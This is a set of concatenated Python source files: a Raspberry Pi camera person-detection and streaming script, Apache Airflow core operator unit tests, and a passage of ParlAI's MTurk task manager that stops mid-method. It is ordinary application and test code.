    msg.html = render_template(template + '.html', **kwargs)
    worker = Thread(target=send_async_email, args=[app, msg])
    worker.start()
    return worker
|
Main.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# from __future__ import absolute_import
# from __future__ import division
# from __future__ import print_function
import argparse
import io
import re
import time
import sys
import json
import picamera
import subprocess
from mbp_client import MBPclient
from ImageRecognitionManager import ImageRecognitionManager
from CameraStreamer import StreamingOutput
from CameraStreamer import StreamingHandler
from CameraStreamer import StreamingServer
from TokenValidationManager import TokenValidationManager
import threading
from PIL import Image
from datetime import datetime
from functools import partial
# Pi camera capture resolution (also used for the MJPEG stream)
CAMERA_WIDTH = 640
CAMERA_HEIGHT = 480
def image_rec_thread_function(image_rec_manager, camera, mqtt_client):
    """Worker-thread loop: grab JPEG frames from the camera, run person
    detection on each, and publish the result over MQTT.

    Publishes 1.0 plus the analyzed frame when a person is detected,
    otherwise 0.0. Runs until any exception occurs (e.g. camera closed
    during shutdown), which ends the thread.
    """
    while True:
        try:
            stream = io.BytesIO()
            # capture() writes into the stream; its return value is unused (was
            # previously bound to a dead variable)
            camera.capture(stream, format='jpeg', use_video_port=True)
            image = Image.open(stream).convert('RGB').resize(
                (image_rec_manager.input_width, image_rec_manager.input_height),
                Image.ANTIALIAS)
            personWasDetected = image_rec_manager.analize_image(image)
            if personWasDetected:
                mqtt_client.send_data(1.0)
                imgByteArr = io.BytesIO()
                image.save(imgByteArr, format='jpeg')
                imgByteArr.seek(0)
                mqtt_client.send_image(imgByteArr.read())
            else:
                mqtt_client.send_data(0.0)
        except Exception:  # narrowed from bare except; KeyboardInterrupt/SystemExit propagate
            error = sys.exc_info()
            print("Ending thread. Please wait")
            print('Error:', str(error))
            break
def main():
    """Entry point: starts the camera, the recognition worker thread, and a
    streaming web server on port 8000; cleans everything up on exit.

    Fix: ``server`` is now initialized to None before the try block — the
    original referenced it in the except handler, raising a NameError if
    StreamingServer construction itself failed.
    """
    camera = picamera.PiCamera(resolution=(CAMERA_WIDTH, CAMERA_HEIGHT), framerate=30)
    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--model', help='File path of .tflite file.', required=False, default='detect.tflite')
    parser.add_argument(
        '--threshold',
        help='Score threshold for detected objects.',
        required=False,
        type=float,
        default=0.4)
    args = parser.parse_args()
    mqtt_client = MBPclient()
    mqtt_client.connect()
    image_rec_manager = ImageRecognitionManager(args.model, args.threshold)
    # Daemon thread: must not block process exit
    cs1 = threading.Thread(name='consumer1', target=image_rec_thread_function, args=(image_rec_manager, camera, mqtt_client))
    cs1.daemon = True
    cs1.start()
    streaming_output = StreamingOutput()
    token_validation_manager = TokenValidationManager()
    camera.start_recording(streaming_output, format='mjpeg')
    server = None  # guarded: referenced during cleanup even if construction fails
    try:
        handler = partial(StreamingHandler, streaming_output, token_validation_manager)
        server = StreamingServer(('', 8000), handler)
        print("Starting web server on http://localhost:8000/")
        server.serve_forever()
    except (Exception, KeyboardInterrupt):  # Ctrl-C must also run this cleanup path
        error = sys.exc_info()
        print("Ending program. Please wait")
        print('Error:', str(error))
        camera.close()
        time.sleep(2)
        if server is not None:
            server.shutdown()
            time.sleep(2)
        mqtt_client.finalize()
        time.sleep(2)
        return
# Run the capture/recognition/streaming service when executed as a script.
if __name__ == '__main__':
    main()
|
test_core.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import signal
import unittest
from datetime import timedelta
from time import sleep
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from airflow import settings
from airflow.exceptions import AirflowException, AirflowTaskTimeout
from airflow.hooks.base_hook import BaseHook
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models import DagBag, DagRun, TaskFail, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.settings import Session
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'  # dag_folder with no user DAGs; only bundled examples load
DEFAULT_DATE = datetime(2015, 1, 1)  # fixed execution date used across all tests
TEST_DAG_ID = 'unit_tests'
class OperatorSubclass(BaseOperator):
    """
    An operator to test template substitution
    """
    # Fields named here are rendered by Airflow's templating engine before execute()
    template_fields = ['some_templated_field']

    def __init__(self, some_templated_field, *args, **kwargs):
        """Store the value that templating will render (may be any structure)."""
        super().__init__(*args, **kwargs)
        self.some_templated_field = some_templated_field

    def execute(self, context):
        """No-op: tests exercise template rendering, not execution."""
        pass
class TestCore(unittest.TestCase):
    """Integration-style tests for core operator execution: bash/python
    operators, templating, timeouts, callbacks, and date/time utilities."""

    default_scheduler_args = {"num_runs": 1}

    def setUp(self):
        """Load the example DagBag and build a fresh scratch DAG per test."""
        self.dagbag = DagBag(
            dag_folder=DEV_NULL, include_examples=True)
        self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
        self.dag = DAG(TEST_DAG_ID, default_args=self.args)
        self.dag_bash = self.dagbag.dags['example_bash_operator']
        self.runme_0 = self.dag_bash.get_task('runme_0')
        self.run_after_loop = self.dag_bash.get_task('run_after_loop')
        self.run_this_last = self.dag_bash.get_task('run_this_last')

    def tearDown(self):
        """Remove DB rows the test DAG created (runs, instances, failures)."""
        session = Session()
        session.query(DagRun).filter(
            DagRun.dag_id == TEST_DAG_ID).delete(
            synchronize_session=False)
        session.query(TaskInstance).filter(
            TaskInstance.dag_id == TEST_DAG_ID).delete(
            synchronize_session=False)
        session.query(TaskFail).filter(
            TaskFail.dag_id == TEST_DAG_ID).delete(
            synchronize_session=False)
        session.commit()
        session.close()

    def test_check_operators(self):
        """CheckOperator and ValueCheckOperator run against a scratch sqlite table."""
        conn_id = "sqlite_default"
        captain_hook = BaseHook.get_hook(conn_id=conn_id)  # quite funny :D
        captain_hook.run("CREATE TABLE operator_test_table (a, b)")
        captain_hook.run("insert into operator_test_table values (1,2)")
        op = CheckOperator(
            task_id='check',
            sql="select count(*) from operator_test_table",
            conn_id=conn_id,
            dag=self.dag)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        op = ValueCheckOperator(
            task_id='value_check',
            pass_value=95,
            tolerance=0.1,  # 100 is within 10% of 95, so this passes
            conn_id=conn_id,
            sql="SELECT 100",
            dag=self.dag)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        captain_hook.run("drop table operator_test_table")

    def test_clear_api(self):
        """Task.clear plus dependents check should not raise."""
        task = self.dag_bash.tasks[0]
        task.clear(
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
            upstream=True, downstream=True)
        ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        ti.are_dependents_done()

    def test_illegal_args(self):
        """
        Tests that Operators reject illegal arguments
        """
        msg = 'Invalid arguments were passed to BashOperator (task_id: test_illegal_args).'
        with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
            with self.assertWarns(PendingDeprecationWarning) as warning:
                BashOperator(
                    task_id='test_illegal_args',
                    bash_command='echo success',
                    dag=self.dag,
                    illegal_argument_1234='hello?')
                assert any(msg in str(w) for w in warning.warnings)

    def test_illegal_args_forbidden(self):
        """
        Tests that operators raise exceptions on illegal arguments when
        illegal arguments are not allowed.
        """
        with self.assertRaises(AirflowException) as ctx:
            BashOperator(
                task_id='test_illegal_args',
                bash_command='echo success',
                dag=self.dag,
                illegal_argument_1234='hello?')
        self.assertIn(
            ('Invalid arguments were passed to BashOperator '
             '(task_id: test_illegal_args).'),
            str(ctx.exception))

    def test_bash_operator(self):
        """A trivial bash command runs to completion."""
        op = BashOperator(
            task_id='test_bash_operator',
            bash_command="echo success",
            dag=self.dag)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_bash_operator_multi_byte_output(self):
        """Non-ASCII (multi-byte UTF-8) output must not break log handling."""
        op = BashOperator(
            task_id='test_multi_byte_bash_operator',
            bash_command="echo \u2600",
            dag=self.dag,
            output_encoding='utf-8')
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_bash_operator_kill(self):
        """A timed-out bash task's child process must actually be killed."""
        import psutil
        # Unique sleep duration so the child process is identifiable below
        sleep_time = "100%d" % os.getpid()
        op = BashOperator(
            task_id='test_bash_operator_kill',
            execution_timeout=timedelta(seconds=1),
            bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
            dag=self.dag)
        self.assertRaises(
            AirflowTaskTimeout,
            op.run,
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        sleep(2)
        pid = -1
        for proc in psutil.process_iter():
            if proc.cmdline() == ['sleep', sleep_time]:
                pid = proc.pid
        if pid != -1:
            # Orphaned child survived the timeout: clean it up and fail
            os.kill(pid, signal.SIGTERM)
            self.fail("BashOperator's subprocess still running after stopping on timeout!")

    def test_on_failure_callback(self):
        # Annoying workaround for nonlocal not existing in python 2
        data = {'called': False}

        def check_failure(context, test_case=self):
            data['called'] = True
            error = context.get('exception')
            test_case.assertIsInstance(error, AirflowException)

        op = BashOperator(
            task_id='check_on_failure_callback',
            bash_command="exit 1",
            dag=self.dag,
            on_failure_callback=check_failure)
        self.assertRaises(
            AirflowException,
            op.run,
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        self.assertTrue(data['called'])

    def test_dryrun(self):
        """dry_run renders templates without executing the command."""
        op = BashOperator(
            task_id='test_dryrun',
            bash_command="echo success",
            dag=self.dag)
        op.dry_run()

    def test_sqlite(self):
        """SqliteOperator executes DDL against the default sqlite connection."""
        import airflow.providers.sqlite.operators.sqlite
        op = airflow.providers.sqlite.operators.sqlite.SqliteOperator(
            task_id='time_sqlite',
            sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
            dag=self.dag)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_timeout(self):
        """A python callable exceeding execution_timeout raises AirflowTaskTimeout."""
        op = PythonOperator(
            task_id='test_timeout',
            execution_timeout=timedelta(seconds=1),
            python_callable=lambda: sleep(5),
            dag=self.dag)
        self.assertRaises(
            AirflowTaskTimeout,
            op.run,
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_python_op(self):
        """templates_dict values are rendered before the callable runs."""
        def test_py_op(templates_dict, ds, **kwargs):
            if not templates_dict['ds'] == ds:
                raise Exception("failure")

        op = PythonOperator(
            task_id='test_py_op',
            python_callable=test_py_op,
            templates_dict={'ds': "{{ ds }}"},
            dag=self.dag)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_complex_template(self):
        """Templating recurses into nested dict/list structures."""
        def verify_templated_field(context):
            self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
                             context['ds'])

        op = OperatorSubclass(
            task_id='test_complex_template',
            some_templated_field={
                'foo': '123',
                'bar': ['baz', '{{ ds }}']
            },
            dag=self.dag)
        # Replace execute so the assertion runs with the rendered context
        op.execute = verify_templated_field
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_template_non_bool(self):
        """
        Test templates can handle objects with no sense of truthiness
        """
        class NonBoolObject:
            def __len__(self):  # pylint: disable=invalid-length-returned
                return NotImplemented

            def __bool__(self):
                return NotImplemented

        op = OperatorSubclass(
            task_id='test_bad_template_obj',
            some_templated_field=NonBoolObject(),
            dag=self.dag)
        op.resolve_template_files()

    def test_task_get_template(self):
        """The template context exposes the expected ds/ts date macros."""
        TI = TaskInstance
        ti = TI(
            task=self.runme_0, execution_date=DEFAULT_DATE)
        ti.dag = self.dag_bash
        ti.run(ignore_ti_state=True)
        context = ti.get_template_context()

        # DEFAULT DATE is 2015-01-01
        self.assertEqual(context['ds'], '2015-01-01')
        self.assertEqual(context['ds_nodash'], '20150101')

        # next_ds is 2015-01-02 as the dag interval is daily
        self.assertEqual(context['next_ds'], '2015-01-02')
        self.assertEqual(context['next_ds_nodash'], '20150102')

        # prev_ds is 2014-12-31 as the dag interval is daily
        self.assertEqual(context['prev_ds'], '2014-12-31')
        self.assertEqual(context['prev_ds_nodash'], '20141231')

        self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
        self.assertEqual(context['ts_nodash'], '20150101T000000')
        self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')

        self.assertEqual(context['yesterday_ds'], '2014-12-31')
        self.assertEqual(context['yesterday_ds_nodash'], '20141231')

        self.assertEqual(context['tomorrow_ds'], '2015-01-02')
        self.assertEqual(context['tomorrow_ds_nodash'], '20150102')

    def test_local_task_job(self):
        """A LocalTaskJob runs a task instance end to end."""
        TI = TaskInstance
        ti = TI(
            task=self.runme_0, execution_date=DEFAULT_DATE)
        job = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
        job.run()

    def test_raw_job(self):
        """Running the task instance directly (no job wrapper) also works."""
        TI = TaskInstance
        ti = TI(
            task=self.runme_0, execution_date=DEFAULT_DATE)
        ti.dag = self.dag_bash
        ti.run(ignore_ti_state=True)

    def test_round_time(self):
        """round_time snaps datetimes to interval boundaries (with/without a start)."""
        rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
        self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)

        rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
        self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)

        rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
            2015, 9, 14, 0, 0))
        self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)

        rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
            2015, 9, 14, 0, 0))
        self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)

        rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
            2015, 9, 14, 0, 0))
        self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)

        rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
            2015, 9, 14, 0, 0))
        self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)

    def test_infer_time_unit(self):
        """infer_time_unit picks the largest unit keeping values readable."""
        self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))

        self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))

        self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))

        self.assertEqual('days', infer_time_unit([200000, 100000]))

    def test_scale_time_units(self):
        # use assert_almost_equal from numpy.testing since we are comparing
        # floating point arrays
        arr1 = scale_time_units([130, 5400, 10], 'minutes')
        assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)

        arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
        assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)

        arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
        assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
                                  decimal=3)

        arr4 = scale_time_units([200000, 100000], 'days')
        assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)

    def test_bad_trigger_rule(self):
        """An unknown trigger_rule is rejected at construction time."""
        with self.assertRaises(AirflowException):
            DummyOperator(
                task_id='test_bad_trigger',
                trigger_rule="non_existent",
                dag=self.dag)

    def test_terminate_task(self):
        """If a task instance's db state get deleted, it should fail"""
        from airflow.executors.sequential_executor import SequentialExecutor
        TI = TaskInstance
        dag = self.dagbag.dags.get('test_utils')
        task = dag.task_dict.get('sleeps_forever')

        ti = TI(task=task, execution_date=DEFAULT_DATE)
        job = LocalTaskJob(
            task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())

        # Running task instance asynchronously
        proc = multiprocessing.Process(target=job.run)
        proc.start()
        sleep(5)
        # Dispose pooled connections before using the engine from this process
        settings.engine.dispose()
        session = settings.Session()
        ti.refresh_from_db(session=session)
        # making sure it's actually running
        self.assertEqual(State.RUNNING, ti.state)
        ti = session.query(TI).filter_by(
            dag_id=task.dag_id,
            task_id=task.task_id,
            execution_date=DEFAULT_DATE
        ).one()

        # deleting the instance should result in a failure
        session.delete(ti)
        session.commit()
        # waiting for the async task to finish
        proc.join()

        # making sure that the task ended up as failed
        ti.refresh_from_db(session=session)
        self.assertEqual(State.FAILED, ti.state)
        session.close()

    def test_task_fail_duration(self):
        """If a task fails, the duration should be recorded in TaskFail"""
        op1 = BashOperator(
            task_id='pass_sleepy',
            bash_command='sleep 3',
            dag=self.dag)
        op2 = BashOperator(
            task_id='fail_sleepy',
            bash_command='sleep 5',
            execution_timeout=timedelta(seconds=3),
            retry_delay=timedelta(seconds=0),
            dag=self.dag)
        session = settings.Session()
        try:
            op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:  # pylint: disable=broad-except
            pass
        try:
            op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:  # pylint: disable=broad-except
            pass
        op1_fails = session.query(TaskFail).filter_by(
            task_id='pass_sleepy',
            dag_id=self.dag.dag_id,
            execution_date=DEFAULT_DATE).all()
        op2_fails = session.query(TaskFail).filter_by(
            task_id='fail_sleepy',
            dag_id=self.dag.dag_id,
            execution_date=DEFAULT_DATE).all()

        self.assertEqual(0, len(op1_fails))
        self.assertEqual(1, len(op2_fails))
        self.assertGreaterEqual(sum([f.duration for f in op2_fails]), 3)

    def test_externally_triggered_dagrun(self):
        """For manually triggered runs, next_ds/prev_ds equal the execution date."""
        TI = TaskInstance

        # Create the dagrun between two "scheduled" execution dates of the DAG
        execution_date = DEFAULT_DATE + timedelta(days=2)
        execution_ds = execution_date.strftime('%Y-%m-%d')
        execution_ds_nodash = execution_ds.replace('-', '')

        dag = DAG(
            TEST_DAG_ID,
            default_args=self.args,
            schedule_interval=timedelta(weeks=1),
            start_date=DEFAULT_DATE)
        task = DummyOperator(task_id='test_externally_triggered_dag_context',
                             dag=dag)
        dag.create_dagrun(run_type=DagRunType.SCHEDULED,
                          execution_date=execution_date,
                          state=State.RUNNING,
                          external_trigger=True)
        task.run(
            start_date=execution_date, end_date=execution_date)

        ti = TI(task=task, execution_date=execution_date)
        context = ti.get_template_context()

        # next_ds/prev_ds should be the execution date for manually triggered runs
        self.assertEqual(context['next_ds'], execution_ds)
        self.assertEqual(context['next_ds_nodash'], execution_ds_nodash)
        self.assertEqual(context['prev_ds'], execution_ds)
        self.assertEqual(context['prev_ds_nodash'], execution_ds_nodash)
|
mturk_manager.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import math
import os
import pickle
import threading
import time
import uuid
import errno
import requests
from parlai.mturk.core.agents import AssignState
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.worker_manager import WorkerManager
from parlai.mturk.core.mturk_data_handler import MTurkDataHandler
import parlai.mturk.core.data_model as data_model
import parlai.mturk.core.mturk_utils as mturk_utils
import parlai.mturk.core.server_utils as server_utils
import parlai.mturk.core.shared_utils as shared_utils
# Timeout before cancelling a world start
WORLD_START_TIMEOUT = 11

# Multiplier to apply when creating hits to ensure worker availibility
HIT_MULT = 1.5

# 6 minute timeout to ensure only one thread updates the time logs.
# Those update once daily in a 3 minute window
RESET_TIME_LOG_TIMEOUT = 360
TIME_LOGS_FILE_NAME = 'working_time.pickle'
TIME_LOGS_FILE_LOCK = 'working_time.lock'

# SNS notification topic/event names used by MTurk callbacks
AMAZON_SNS_NAME = 'AmazonMTurk'
SNS_ASSIGN_ABANDONDED = 'AssignmentAbandoned'
SNS_ASSIGN_SUBMITTED = 'AssignmentSubmitted'
SNS_ASSIGN_RETURNED = 'AssignmentReturned'

# Endpoints for version notices and opt-in usage statistics
PARLAI_MTURK_NOTICE_URL = 'http://www.parl.ai/mturk/mturk_notice/'
PARLAI_MTURK_UPLOAD_URL = 'http://www.parl.ai/mturk/mturk_stats/'
PARLAI_CRED_DIR = os.path.expanduser('~/.parlai')
PARLAI_MTURK_LOG_PERMISSION_FILE = \
    os.path.join(PARLAI_CRED_DIR, 'mturk_log_permission.pickle')
TWO_WEEKS = 60 * 60 * 24 * 7 * 2  # in seconds

parent_dir = os.path.dirname(os.path.abspath(__file__))
class LockFile():
    """Context manager implementing a simple cross-process lock via exclusive
    file creation (O_CREAT | O_EXCL fails if the file already exists).

    Fix: the original swallowed *every* OSError and retried forever; now only
    EEXIST (lock held by someone else) triggers a retry — other errors
    (permissions, missing directory, ...) are re-raised instead of spinning.
    """
    flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY

    def __init__(self, filename):
        self.filename = filename
        self.fd = None

    def __enter__(self):
        # Spin until we win the exclusive create
        while self.fd is None:
            try:
                self.fd = os.open(self.filename, self.flags)
            except OSError as e:
                if e.errno != errno.EEXIST:
                    raise  # unexpected failure — retrying would loop forever
                time.sleep(shared_utils.THREAD_SHORT_SLEEP)
        return self

    def __exit__(self, *args):
        # Release: close our descriptor and delete the lock file
        os.close(self.fd)
        os.remove(self.filename)
class MTurkManager():
"""Manages interactions between MTurk agents as well as direct interactions
between a world and the MTurk server.
"""
STATE_CREATED = 0 # object created
STATE_SERVER_ALIVE = 1 # heroku server running
STATE_INIT_RUN = 2 # run initialized
STATE_ACCEPTING_WORKERS = 3 # Socket ready to recieve workers
STATE_HITS_MADE = 4 # hits created
def __init__(self, opt, mturk_agent_ids, is_test=False, use_db=False):
    """Create an MTurkManager using the given setup opts and a list of
    agent_ids that will participate in each conversation

    opt: option dict (task config); may be augmented by internal configs
    mturk_agent_ids: one id per agent role in a conversation
    is_test: skip internal config loading when True
    use_db: enable the local sqlite run/assignment logger when True
    """
    if not is_test:
        try:
            import parlai_internal.mturk.configs as local_configs
            opt = local_configs.apply_default_opts(opt)
        except Exception:
            # not all users will be drawing configs from internal settings
            pass

    self.opt = opt
    # Reconcile the per-worker concurrency options
    if self.opt['unique_worker']:
        self.opt['allowed_conversations'] = 1
    elif self.opt['max_hits_per_worker'] != 0 and \
            self.opt['allowed_conversations'] == 0:
        self.opt['allowed_conversations'] = self.opt['max_hits_per_worker']
    self.server_url = None
    self.topic_arn = None
    self.server_task_name = None
    self.port = 443  # task server is reached over https
    self.task_group_id = None
    self.run_id = None
    self.mturk_agent_ids = mturk_agent_ids
    self.task_files_to_copy = None
    self.is_sandbox = opt['is_sandbox']
    self.agent_pool_change_condition = threading.Condition()
    self.onboard_function = None
    self.num_conversations = opt['num_conversations']
    # Over-provision HITs so enough workers are available (see HIT_MULT)
    self.required_hits = math.ceil(
        self.num_conversations * len(self.mturk_agent_ids) * HIT_MULT
    )
    self.minimum_messages = opt.get('min_messages', 0)
    # Default auto-approve after 4 weeks, in seconds
    self.auto_approve_delay = \
        opt.get('auto_approve_delay', 4 * 7 * 24 * 3600)
    self.has_time_limit = opt.get('max_time', 0) > 0
    self.socket_manager = None
    self.worker_manager = WorkerManager(self, opt)
    self.is_test = is_test
    self.is_unique = False
    self.max_hits_per_worker = opt.get('max_hits_per_worker', 0)
    self._init_logging_config()
    self.is_shutdown = False
    self.use_db = use_db  # TODO enable always DB integration is complete
    self.db_logger = None
    self.logging_permitted = False  # granted by _logging_permission_check later
    self.task_state = self.STATE_CREATED
    self._assert_opts()
@staticmethod
def make_taskless_instance(is_sandbox=False):
    """Build a minimal manager with no task attached, suitable only for
    administrative operations: approving or rejecting assignments,
    blocking workers, and managing qualifications.
    """
    minimal_opt = dict(
        unique_worker=False,
        max_hits_per_worker=0,
        num_conversations=0,
        is_sandbox=is_sandbox,
        is_debug=False,
        log_level=30,
    )
    manager = MTurkManager(minimal_opt, [])
    # Mark shut down up front: no server or run machinery will ever start
    manager.is_shutdown = True
    mturk_utils.setup_aws_credentials()
    return manager
# Helpers and internal manager methods #
def _assert_opts(self):
"""Manages ensuring everything about the passed in options make sense
in that they don't conflict in some way or another"""
if self.opt.get('allow_reviews') and len(self.mturk_agent_ids) != 2:
shared_utils.print_and_log(
logging.WARN,
'[OPT CONFIGURATION ISSUE] '
'allow_reviews is currently only supported on 2 person tasks, '
'overriding this value to false.',
should_print=True
)
self.opt['allow_reviews'] = False
if self.opt.get('frontend_version', 0) < 1:
# Ensure no react only features have been set
features = ['frame_height', 'allow_reviews', 'block_mobile']
for feat in features:
if self.opt.get(feat) is not None:
shared_utils.print_and_log(
logging.WARN,
'[OPT CONFIGURATION ISSUE] '
'{} only works when using the react frontend '
'(frontend_version >= 1), so this option will be '
'ignored'.format(feat),
should_print=True
)
    def _init_state(self):
        """Initialize everything in the worker, task, and thread states.

        Called once per run (from `start_new_run`) to reset all per-run
        bookkeeping.
        """
        # TODO handle pooling in own class, note this is an agent_pool
        self.agent_pool = []
        # TODO move some state to DB
        self.hit_id_list = []  # list of outstanding incomplete hits
        self.assignment_to_onboard_thread = {}
        self.conversation_index = 0
        self.started_conversations = 0
        self.completed_conversations = 0
        self.task_threads = []
        self.accepting_workers = True
        # init_load uses the longer (daily) reset window for the time logs
        self._reset_time_logs(init_load=True)
        self.qualifications = None
        self.unique_qual_name = None
        self.time_limit_checked = time.time()
        self.task_state = self.STATE_INIT_RUN
        self.last_hit_check = time.time()
        if self.use_db:
            # sandbox runs get their own DB file, separate from live data
            db_filename = 'pmt_sbdata.db' if self.is_sandbox else 'pmt_data.db'
            self.db_logger = MTurkDataHandler(self.task_group_id, db_filename)
    def _init_logging_config(self):
        """Initialize logging settings from the opt.

        Propagates the debug flag and verbosity to the shared logging
        helpers so all mturk modules log at the same level.
        """
        shared_utils.set_is_debug(self.opt['is_debug'])
        shared_utils.set_log_level(self.opt['log_level'])
    def _logging_permission_check(self):
        """Ask the user (at most once per two weeks) whether ParlAI may
        collect worker acceptance/completion/disconnect rates.

        The answer is cached on disk in PARLAI_MTURK_LOG_PERMISSION_FILE;
        a "yes" is permanent, a "no" expires after TWO_WEEKS and the
        question is asked again. Returns True only when sharing is allowed.
        """
        if self.is_test:
            return False
        if not os.path.exists(PARLAI_CRED_DIR):
            os.makedirs(PARLAI_CRED_DIR)
        if os.path.exists(PARLAI_MTURK_LOG_PERMISSION_FILE):
            # Honor a cached answer unless a "no" has expired
            with open(PARLAI_MTURK_LOG_PERMISSION_FILE, 'rb') as perm_file:
                permissions = pickle.load(perm_file)
                if permissions['allowed'] is True:
                    return True
                elif time.time() - permissions['asked_time'] < TWO_WEEKS:
                    return False
            # Snooze expired
            os.remove(PARLAI_MTURK_LOG_PERMISSION_FILE)
        print(
            'Would you like to help improve ParlAI-MTurk by providing some '
            'metrics? We would like to record acceptance, completion, and '
            'disconnect rates by worker. These metrics let us track the '
            'health of the platform. If you accept we\'ll collect this data '
            'on all of your future runs. We\'d ask before collecting anything '
            'else, but currently we have no plans to. You can decline to '
            'snooze this request for 2 weeks.')
        selected = ''
        while selected not in ['y', 'Y', 'n', 'N']:
            selected = input('Share worker rates? (y/n): ')
            if selected not in ['y', 'Y', 'n', 'N']:
                print('Must type one of (Y/y/N/n)')
        if selected in ['y', 'Y']:
            print('Thanks for helping us make the platform better!')
        # Cache the answer with a timestamp so a "no" can expire later
        permissions = {
            'allowed': selected in ['y', 'Y'],
            'asked_time': time.time()
        }
        with open(PARLAI_MTURK_LOG_PERMISSION_FILE, 'wb+') as perm_file:
            pickle.dump(permissions, perm_file)
        return permissions['allowed']
def _upload_worker_data(self):
"""Uploads worker data acceptance and completion rates to the parlai
server
"""
worker_data = self.worker_manager.get_worker_data_package()
data = {'worker_data': worker_data}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.post(PARLAI_MTURK_UPLOAD_URL, json=data, headers=headers)
    def _maintain_hit_status(self):
        """Launch a daemon thread that polls MTurk (at most every 10s) and
        prunes hits that left the active state from `hit_id_list`.

        The thread exits on its own once no outstanding hits remain.
        """
        def update_status():
            while len(self.hit_id_list) > 0:
                cur_time = time.time()
                # Rate-limit the actual MTurk queries to one pass per 10s
                if cur_time - self.last_hit_check > 10:
                    self.last_hit_check = cur_time
                    # iterate over a copy: we remove entries while scanning
                    for hit_id in self.hit_id_list.copy():
                        hit = self.get_hit(hit_id)
                        hit_data = hit['HIT']
                        if hit_data['HITStatus'] in \
                                ['Reviewable', 'Reviewing', 'Disposed']:
                            self.hit_id_list.remove(hit_id)
                time.sleep(10)
        hit_status_thread = threading.Thread(
            target=update_status, name='Hit-Status-Thread', daemon=True)
        hit_status_thread.start()
    def _should_use_time_logs(self):
        # Used to ensure time logs are properly tracked. Can be overridden for
        # testing
        # NOTE(review): this returns True in *sandbox* mode, yet the callers'
        # comments ("sandbox doesn't check logs", "sandbox does not log
        # working time") imply the opposite polarity — confirm whether this
        # should be `not self.is_sandbox` before relying on time blocking
        # in live runs.
        return self.is_sandbox
    def _reset_time_logs(self, init_load=False, force=False):
        """Clear the shared worker time-log file once its reset window has
